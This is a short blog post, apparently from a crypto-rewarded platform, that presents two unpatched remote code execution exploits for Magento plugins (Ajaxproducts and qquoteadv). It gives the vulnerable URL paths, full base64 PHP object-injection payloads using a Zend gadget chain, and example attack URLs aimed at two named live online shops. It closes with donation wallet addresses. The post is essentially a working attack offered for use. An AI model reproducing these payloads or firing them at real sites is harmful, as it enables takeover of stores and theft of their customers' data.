2 0day RCE Magento Plugin's exploitssteemCreated with Sketch.

in cybersecurity •  7 years ago 

Hello. Now i want to present 2 exploitable Magento Plugins.

Vuln type: RCE
Method: RCE with PHP Object Injection
HTTP GET PARAMETR coded in BASE64, just decode it and check payload. It's really easy. Example of payloads make exit('MazaYana')

  1. Ajaxproducts
    /index.php/ajaxproducts/index/index/?params=Tzo4OiJaZW5kX0xvZyI6MTp7czoxMToiACoAX3dyaXRlcnMiO2E6MTp7aTowO086MjA6IlplbmRfTG9nX1dyaXRlcl9NYWlsIjo1OntzOjE2OiIAKgBfZXZlbnRzVG9NYWlsIjthOjE6e2k6MDtpOjE7fXM6MjI6IgAqAF9sYXlvdXRFdmVudHNUb01haWwiO2E6MDp7fXM6ODoiACoAX21haWwiO086OToiWmVuZF9NYWlsIjowOnt9czoxMDoiACoAX2xheW91dCI7TzoxMToiWmVuZF9MYXlvdXQiOjM6e3M6MTM6IgAqAF9pbmZsZWN0b3IiO086MjM6IlplbmRfRmlsdGVyX1ByZWdSZXBsYWNlIjoyOntzOjE2OiIAKgBfbWF0Y2hQYXR0ZXJuIjtzOjc6Ii8oLiopL2UiO3M6MTU6IgAqAF9yZXBsYWNlbWVudCI7czoxNjoiZXhpdCgiTWFaYVlhTmEiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fQ==

Example: https://tintenzeile.de/index.php/ajaxproducts/index/index/?params=Tzo4OiJaZW5kX0xvZyI6MTp7czoxMToiACoAX3dyaXRlcnMiO2E6MTp7aTowO086MjA6IlplbmRfTG9nX1dyaXRlcl9NYWlsIjo1OntzOjE2OiIAKgBfZXZlbnRzVG9NYWlsIjthOjE6e2k6MDtpOjE7fXM6MjI6IgAqAF9sYXlvdXRFdmVudHNUb01haWwiO2E6MDp7fXM6ODoiACoAX21haWwiO086OToiWmVuZF9NYWlsIjowOnt9czoxMDoiACoAX2xheW91dCI7TzoxMToiWmVuZF9MYXlvdXQiOjM6e3M6MTM6IgAqAF9pbmZsZWN0b3IiO086MjM6IlplbmRfRmlsdGVyX1ByZWdSZXBsYWNlIjoyOntzOjE2OiIAKgBfbWF0Y2hQYXR0ZXJuIjtzOjc6Ii8oLiopL2UiO3M6MTU6IgAqAF9yZXBsYWNlbWVudCI7czoxNjoiZXhpdCgiTWFaYVlhTmEiKSI7fXM6MjA6IgAqAF9pbmZsZWN0b3JFbmFibGVkIjtiOjE7czoxMDoiACoAX2xheW91dCI7czo2OiJsYXlvdXQiO31zOjIyOiIAKgBfc3ViamVjdFByZXBlbmRUZXh0IjtOO319fQ==

  1. /index.php/qquoteadv/download/downloadCustomOption/?id=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ==

Example: http://onestopworkwear.com/index.php/qquoteadv/download/downloadCustomOption/?id=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ==

If will copy this info, please, set link to this article, thanks.

Wallets for donation:
BTC 13mq6pQNvPTdaEk4RsNfCfb7yM4ixBEifM
ETH 0x8061bb5d617dd8958680a9ab900b29cf65a2608b

Thanks, your NullByte.

magento large.png

cybersecurity magento plugins exploit rce
7 years ago by

Downvoting a post can decrease pending rewards and make it less visible. Common reasons:

  • Disagreement on rewards
  • Fraud or plagiarism
  • Hate speech or trolling
  • Miscategorized content or spam

Submit
$0.00
    2 votes
    0
    Authors get paid when people like you upvote their post.
    If you enjoyed what you read here, create your account today and start earning FREE STEEM!